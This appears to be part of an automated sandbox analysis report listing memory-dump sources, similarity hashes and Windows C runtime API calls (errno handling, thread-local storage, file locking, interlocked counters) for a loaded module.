                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$AttributesErrorFileLast__doserrno_dosmaperr_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 1181389587-0
                                                                                                          • Opcode ID: be8ff0a7299e834cfc92c5f746a484b0edbb48c42a53485a254fd94b6c4a23d8
                                                                                                          • Instruction ID: f9761d78e37f130403ec9f6c5bc1fc4fb73d1dca9ce3e53a56888c88ddf5e94c
                                                                                                          • Opcode Fuzzy Hash: be8ff0a7299e834cfc92c5f746a484b0edbb48c42a53485a254fd94b6c4a23d8
                                                                                                          • Instruction Fuzzy Hash: E00186B0445319DADBD22F78C90679D3BA89F42378F014215F8644F1D0DB34B8428BA2
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$__doserrno$AttributesErrorFileLast_dosmaperr_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 4291834686-0
                                                                                                          • Opcode ID: fd1a496e93417c354ecd3294ebd6f81e298e5e3d17b15e0b3963deeccc62517e
                                                                                                          • Instruction ID: 2a9172af20ef90bc72380d5f711b823e9392aebd58b3ccd03e5eb2024b30f8e7
                                                                                                          • Opcode Fuzzy Hash: fd1a496e93417c354ecd3294ebd6f81e298e5e3d17b15e0b3963deeccc62517e
                                                                                                          • Instruction Fuzzy Hash: B001AD70040328EAD7926FB8D90979D3760AF023B8F024226E9348F1E4DB35B4428BB0
                                                                                                          APIs
                                                                                                          • __set_flsgetvalue.MSVCR100 ref: 6FDCC5A2
                                                                                                            • Part of subcall function 6FD80341: TlsGetValue.KERNEL32(?,6FD80713), ref: 6FD8034A
                                                                                                          • __get_tlsindex.MSVCR100 ref: 6FDCC5A7
                                                                                                          • ___fls_getvalue@4.MSVCR100(00000000), ref: 6FDCC5AD
                                                                                                            • Part of subcall function 6FDCC6AA: TlsGetValue.KERNEL32(?), ref: 6FDCC6B8
                                                                                                          • __get_tlsindex.MSVCR100(?), ref: 6FDCC5BA
                                                                                                          • ___fls_setvalue@8.MSVCR100(00000000,?), ref: 6FDCC5C0
                                                                                                            • Part of subcall function 6FDCC6CA: DecodePointer.KERNEL32(?,?), ref: 6FDCC6DB
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCC5C9
                                                                                                          • ExitThread.KERNEL32 ref: 6FDCC5D0
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6FDCC5D6
                                                                                                          • _freefls.MSVCR100(?), ref: 6FDCC5F6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ThreadValue__get_tlsindex$CurrentDecodeErrorExitLastPointer___fls_getvalue@4___fls_setvalue@8__set_flsgetvalue_freefls
                                                                                                          • String ID:
                                                                                                          • API String ID: 1636594015-0
                                                                                                          • Opcode ID: fc6c4a2ad05b0efaf859a15df2e99b1f1d5a7076dff38e8e27be41064681672a
                                                                                                          • Instruction ID: 7c179e03eb0ffa287f7d99e9d5543c69ea65d9c4367135c64ea8083a95e49cdd
                                                                                                          • Opcode Fuzzy Hash: fc6c4a2ad05b0efaf859a15df2e99b1f1d5a7076dff38e8e27be41064681672a
                                                                                                          • Instruction Fuzzy Hash: ECF096754007C0EFD745EF71C64881E3BECAF453583148514EA458B261DB34F842CBB2
                                                                                                          APIs
                                                                                                          • _get_daylight.MSVCR100(?,?,?,00000000,?,?,?,?,?,6FDA7E43,?,?,?), ref: 6FDDA0D0
                                                                                                          • _get_dstbias.MSVCR100(?,?,?,00000000,?,?,?,?,?,6FDA7E43,?,?,?), ref: 6FDDA0E2
                                                                                                          • _get_timezone.MSVCR100(?,?,?,00000000,?,?,?,?,?,6FDA7E43,?,?,?), ref: 6FDDA0F4
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?,?,6FDA7E43,?,?), ref: 6FDDA1FC
                                                                                                            • Part of subcall function 6FDFAF2C: GetCurrentProcess.KERNEL32(C0000417), ref: 6FDFAF42
                                                                                                            • Part of subcall function 6FDFAF2C: TerminateProcess.KERNEL32(00000000), ref: 6FDFAF49
                                                                                                          • _errno.MSVCR100(?,?,00000000,?,?,?,?,?,6FDA7E43,?,?,?,?,?,?,000000FF), ref: 6FDDA201
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CurrentTerminate_errno_get_daylight_get_dstbias_get_timezone_invoke_watson
                                                                                                          • String ID: ;$;
                                                                                                          • API String ID: 305590698-2543639521
                                                                                                          • Opcode ID: 8e4330eaf520168b1f22caed886c0954a82a1f6339cdde582dca4e847fbcce36
                                                                                                          • Instruction ID: 94fe3fff56423b215839fb7dbb8100604250d660c61224db6050ce5051b36e47
                                                                                                          • Opcode Fuzzy Hash: 8e4330eaf520168b1f22caed886c0954a82a1f6339cdde582dca4e847fbcce36
                                                                                                          • Instruction Fuzzy Hash: 5F718EB1A0031A9BDB44DFA9CC81BDE77FAAF49324F14812AF514E7291E731F9048B60
                                                                                                          APIs
                                                                                                          • memset.MSVCR100(00000000,00000000,00000090,00000083,00000001,000000BC,?,6FD86D45,?,00000001,00000000,00000000,00000005), ref: 6FD8668E
                                                                                                          • strncpy_s.MSVCR100(00000080,00000010,00000001,0000000F,00000000,00000000,00000005), ref: 6FD92886
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memsetstrncpy_s
                                                                                                          • String ID: _.,
                                                                                                          • API String ID: 388526945-2709443920
                                                                                                          • Opcode ID: c30df80dcaab132e44bd71bb141587c6fffd3ba923bb8ab3b4f6e4669016f655
                                                                                                          • Instruction ID: 6d6eda8aafc712d60482a87ea50158d8a0540b685ea072712f620c655e2a0709
                                                                                                          • Opcode Fuzzy Hash: c30df80dcaab132e44bd71bb141587c6fffd3ba923bb8ab3b4f6e4669016f655
                                                                                                          • Instruction Fuzzy Hash: B53125F2149346EDEBA04F348E09FDA375DDF023ECF00591AF9AB9A081D731B5008659
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                                                                          • String ID: P
                                                                                                          • API String ID: 2819658684-3110715001
                                                                                                          • Opcode ID: 8d24361130e1c7c7f239276ebd7c079275cef1ef6a29c025b795dfb819a636ad
                                                                                                          • Instruction ID: ee3d0aebcad437cd81f4a5a9dbcbe1ce3276a5530da7c12fbf7f0d2250ceac09
                                                                                                          • Opcode Fuzzy Hash: 8d24361130e1c7c7f239276ebd7c079275cef1ef6a29c025b795dfb819a636ad
                                                                                                          • Instruction Fuzzy Hash: A231617194038AEBCBA0EFACC88499E77B4BF05328F10465AF8709B1D0E771B9529791
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDA9333
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDA933E
                                                                                                          • _errno.MSVCR100(?), ref: 6FDA934B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDA9356
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD64B4
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD64BF
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDD64DB
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD64E6
                                                                                                          APIs
                                                                                                          • _fileno.MSVCR100(00000000,?,?,?,?,6FDD47D5,00000000,6FDD4800,00000010,6FDD3CD9,00000000), ref: 6FDD4467
                                                                                                          • _lseeki64.MSVCR100(00000000,00000000,00000000,00000001,?,?,?,?,6FDD47D5,00000000,6FDD4800,00000010,6FDD3CD9,00000000), ref: 6FDD4484
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?), ref: 6FDF2928
                                                                                                          • _isleadbyte_l.MSVCR100(?,?,?,?,?), ref: 6FDF29B4
                                                                                                          • _errno.MSVCR100(?,?,?), ref: 6FDF2A50
                                                                                                          • _errno.MSVCR100(?,?,?), ref: 6FDF2A6B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDF2933
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100(?,?), ref: 6FDF2953
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?), ref: 6FDF295E
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?), ref: 6FDF2A76
                                                                                                          APIs
                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,32054ECC), ref: 6FDC82CB
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC82D9
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC82F2
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDC8301
                                                                                                          • memset.MSVCR100(?,00000000,0000000C), ref: 6FDC8367
                                                                                                          • SetThreadPriority.KERNEL32(?,?,?), ref: 6FDC839B
                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6FDC83A7
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6FDC83B8
                                                                                                          APIs
                                                                                                          • _fileno.MSVCR100(?,?,?,?,?,6FD93129,?), ref: 6FD8CDC5
                                                                                                          • _read.MSVCR100(00000000,?,?,?,?,6FD93129,?), ref: 6FD8CDCC
                                                                                                          • _fileno.MSVCR100(?), ref: 6FD8CDEF
                                                                                                          • _fileno.MSVCR100(?), ref: 6FD8CDFF
                                                                                                          • _fileno.MSVCR100(?), ref: 6FD8CE10
                                                                                                          • _fileno.MSVCR100(?,?), ref: 6FD8CE20
                                                                                                          • _errno.MSVCR100(?,?,6FD93129,?), ref: 6FDA870C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FD93129,?), ref: 6FDA8717
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,6FD84295,?), ref: 6FDA875A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FD84295,?), ref: 6FDA8765
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(00000001,00000000,00000001,00000002,?,?,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FD96DEE
                                                                                                          • _get_osfhandle.MSVCR100(?,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FD96DF8
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FD96DFF
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FD96E06
                                                                                                            • Part of subcall function 6FD8A6BA: _get_osfhandle.MSVCR100(?,?,?,?,6FD8A795,?,6FD8A7B0,00000010), ref: 6FD8A6C5
                                                                                                            • Part of subcall function 6FD8A6BA: _get_osfhandle.MSVCR100(?), ref: 6FD8A6E8
                                                                                                            • Part of subcall function 6FD8A6BA: CloseHandle.KERNEL32(00000000), ref: 6FD8A6EF
                                                                                                          • _errno.MSVCR100(?,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FDB0531
                                                                                                          • __doserrno.MSVCR100(?,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FDB053C
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDE562
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDE56C
                                                                                                          • _errno.MSVCR100 ref: 6FDDE583
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDE58D
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _ismbblead_l.MSVCR100(?,?,?), ref: 6FDDE5A7
                                                                                                          • _errno.MSVCR100(?), ref: 6FDDE5C5
                                                                                                          APIs
                                                                                                          • __crtCompareStringW.MSVCR100(?,00001001,00000000,?,?,?,?), ref: 6FD95FBC
                                                                                                          • _errno.MSVCR100 ref: 6FDAC74B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDAC756
                                                                                                          • _errno.MSVCR100 ref: 6FDAC765
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDAC770
                                                                                                          • _errno.MSVCR100 ref: 6FDAC77F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDAC78A
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FD8ACEE: _lock.MSVCR100(0000000B,6FD8AD58,00000018,6FD8AFDD,00000000,?), ref: 6FD8AD15
                                                                                                          • _errno.MSVCR100(6FDFA210,00000018,6FDFA2BF,?,?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA105
                                                                                                          • __doserrno.MSVCR100(6FDFA210,00000018,6FDFA2BF,?,?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA110
                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002,6FDFA210,00000018,6FDFA2BF,?,?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA132
                                                                                                          • _get_osfhandle.MSVCR100(?,00000000,?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA138
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA13F
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA142
                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA14C
                                                                                                          • _dosmaperr.MSVCR100(00000000,?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA168
                                                                                                          APIs
                                                                                                          • _mbsrchr.MSVCR100(6FE283F4,0000002E,6FE283F4,00000012), ref: 6FDD6957
                                                                                                            • Part of subcall function 6FDE15E3: _mbsrchr_l.MSVCR100(00000400,6FDCF396,00000000,?,6FDCEF5D,6FDCF396,0000002E,?,?,?,6FDCF396,00000400,?), ref: 6FDE15F0
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FE283F4,00000012), ref: 6FDD696E
                                                                                                          • strtoul.MSVCR100(00000001,00000000,00000020,00000000,6FE283F4,00000012), ref: 6FDD697F
                                                                                                          • _ultoa_s.MSVCR100(?,?,00000008,00000020,00000000,6FE283F4,00000012), ref: 6FDD69A8
                                                                                                          • strcpy_s.MSVCR100(00000001,00000000,?,?,?,?,?,00000000,6FE283F4,00000012), ref: 6FDD69BF
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,6FE283F4,00000012), ref: 6FDD69D0
                                                                                                          • _errno.MSVCR100(6FDD6B18,00000010,6FDD6B6A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD69E7
                                                                                                          • _errno.MSVCR100(6FDD6B18,00000010,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,6FE283F4,00000012), ref: 6FDD6A02
                                                                                                          APIs
                                                                                                          • wcsrchr.MSVCR100(6FE28448,0000002E,6FE28448,00000012,00000000), ref: 6FDD8626
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FE28448,00000012,00000000), ref: 6FDD8641
                                                                                                          • wcstoul.MSVCR100(00000002,00000000,00000020,6FE28448,00000012,00000000), ref: 6FDD865D
                                                                                                          • _ultow_s.MSVCR100(?,?,00000008,00000020,6FE28448,00000012,00000000), ref: 6FDD8674
                                                                                                          • wcscpy_s.MSVCR100(00000002,00000000,?,?,?,?,?,6FE28448,00000012,00000000), ref: 6FDD8688
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,?,6FE28448,00000012,00000000), ref: 6FDD869B
                                                                                                          • _errno.MSVCR100(6FDD87E8,00000010,6FDD883A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD86B2
                                                                                                          • _errno.MSVCR100(6FDD87E8,00000010,00000000,00000000,00000000,00000000,00000000,?,?,?,?,6FE28448,00000012,00000000), ref: 6FDD86CD
                                                                                                          APIs
                                                                                                          • wcslen.MSVCR100(00000000,?,00000000,6FDB0861,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD92444
                                                                                                          • _calloc_crt.MSVCR100(00000001,00000004,?,?,00000000,6FDB0861,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD92455
                                                                                                          • wcslen.MSVCR100(00000000,?,?,00000000,6FDB0861,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD92479
                                                                                                          • _calloc_crt.MSVCR100(00000001,00000002,?,?,00000000,6FDB0861,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD9248B
                                                                                                          • wcscpy_s.MSVCR100(00000000,00000001,00000000,?,?,00000000,6FDB0861,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD9249F
                                                                                                          • free.MSVCR100(?,?,00000000,6FDB0861,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD924BD
                                                                                                          APIs
                                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0,?,6FD8B911), ref: 6FD8AA51
                                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0,?,6FD8B911), ref: 6FD8AA5E
                                                                                                          • _msize.MSVCR100(00000000,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD8AA7B
                                                                                                            • Part of subcall function 6FD825DA: HeapSize.KERNEL32(00000000,00000000,?,6FD8AA80,00000000,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?), ref: 6FD825F4
                                                                                                          • EncodePointer.KERNEL32(?,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD8AA97
                                                                                                          • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD8AA9F
                                                                                                          • _realloc_crt.MSVCR100(00000000,00000800,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD9283A
                                                                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD92850
                                                                                                          Similarity
                                                                                                          • API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
                                                                                                          • String ID:
                                                                                                          • API String ID: 765448609-0
                                                                                                          • Opcode ID: bd905d8d430f0cf85960f7712927660a3e74413a9672ce9da7a1e3cd3582276a
                                                                                                          • Instruction ID: 882ebdad3d62b8874464145ed1537e2495497110b9fe71a0f54ed48ac9365a00
                                                                                                          • Opcode Fuzzy Hash: bd905d8d430f0cf85960f7712927660a3e74413a9672ce9da7a1e3cd3582276a
                                                                                                          • Instruction Fuzzy Hash: C011D37660031AEFDB409FB9DD8088A7BEDFB862A6311063BE401E7150FB71FD158A94
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FD913A2: _get_osfhandle.MSVCR100(00000000,?,?,6FD8D27B,?,00000000,00000000), ref: 6FD913AC
                                                                                                            • Part of subcall function 6FD913A2: SetFilePointer.KERNEL32(00000000,?,00000000,6FD8D27B,00000000,?,?,6FD8D27B,?,00000000,00000000), ref: 6FD913C5
                                                                                                          • _get_osfhandle.MSVCR100(?,00000000,00000000,?,00000000), ref: 6FDFA953
                                                                                                          • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 6FDFA95F
                                                                                                          • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 6FDFA967
                                                                                                          • GetLastError.KERNEL32 ref: 6FDFA971
                                                                                                          • Sleep.KERNEL32(000003E8), ref: 6FDFA987
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDFA9A3
                                                                                                          • _errno.MSVCR100 ref: 6FDFA9AB
                                                                                                          • __doserrno.MSVCR100 ref: 6FDFA9B6
                                                                                                          Similarity
                                                                                                          • API ID: File$_get_osfhandle$ErrorLastLockPointerSleepUnlock__doserrno_dosmaperr_errno
                                                                                                          • String ID:
                                                                                                          • API String ID: 3892553819-0
                                                                                                          • Opcode ID: 387a33c679bef24cc6c659b1b9208225730ec43d42cb7bc1a6f4d523fa5bba77
                                                                                                          • Instruction ID: 869ecfe5d05aea893ad2a0d0a360019c4dccfac878a9d12e9c9aebaec5f0e7ef
                                                                                                          • Opcode Fuzzy Hash: 387a33c679bef24cc6c659b1b9208225730ec43d42cb7bc1a6f4d523fa5bba77
                                                                                                          • Instruction Fuzzy Hash: F5117231542725FFDBA15F62C908E9E3B74EF427B4B478226E4248A1C0D730BA42CA61
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,6FDF68DE,?,?), ref: 6FDF6A33
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FDF68DE,?,?), ref: 6FDF6A3E
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100(?,?,?,6FDF68DE,?,?), ref: 6FDF6A50
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 4106058386-0
                                                                                                          • Opcode ID: 741c12903f02be10130847b1a7d444a73bd2747db00bfbce844fafae5b4108b6
                                                                                                          • Instruction ID: fbf9517b887b06ec8cd5b1be096f34a029338a5ae43dd52a9bc92f229a85967a
                                                                                                          • Opcode Fuzzy Hash: 741c12903f02be10130847b1a7d444a73bd2747db00bfbce844fafae5b4108b6
                                                                                                          • Instruction Fuzzy Hash: BA119D71502354EFEB505F64C808F4E3BA4EB433A4F168211E9219B1D0EB30B9519BA0
                                                                                                          APIs
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD8270D
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD82778
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD82788
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD86922
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD886C9
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD886D1
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD886D9
                                                                                                          Similarity
                                                                                                          • API ID: DecrementInterlocked
                                                                                                          • String ID:
                                                                                                          • API String ID: 3448037634-0
                                                                                                          • Opcode ID: ef1679057d215a1fbce05958b3d8f56c1cc1f05aa1a71252c269b7971c26e9eb
                                                                                                          • Instruction ID: c7477ed1a2f689488cd7b60716e3b6f60892374724600e9f4a7401bdee787615
                                                                                                          • Opcode Fuzzy Hash: ef1679057d215a1fbce05958b3d8f56c1cc1f05aa1a71252c269b7971c26e9eb
                                                                                                          • Instruction Fuzzy Hash: 80114F74B44319EBDB409F7ACD84B4AF7ACBF4675AF044526E928DB100D774F4018BA0
                                                                                                          APIs
                                                                                                          • InterlockedIncrement.KERNEL32(00000001), ref: 6FD81F72
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 6FD81FDD
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 6FD81FEB
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 6FD8252C
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 6FD82535
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 6FD8253D
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 6FD82545
                                                                                                          Similarity
                                                                                                          • API ID: IncrementInterlocked
                                                                                                          • String ID:
                                                                                                          • API String ID: 3508698243-0
                                                                                                          • Opcode ID: 7f2d96db30282962e9827627960beb581229818ef05f63f68c9d3f1f1131406e
                                                                                                          • Instruction ID: 00e51d7be46c631cbe124ed9878bb027801f6c383d6dec2a5165a2c1d4f50473
                                                                                                          • Opcode Fuzzy Hash: 7f2d96db30282962e9827627960beb581229818ef05f63f68c9d3f1f1131406e
                                                                                                          • Instruction Fuzzy Hash: 21114C76B88319EBDB819F79CD84B4AF7ACAF05354F044666A538CB100D774F4188BA0
                                                                                                          APIs
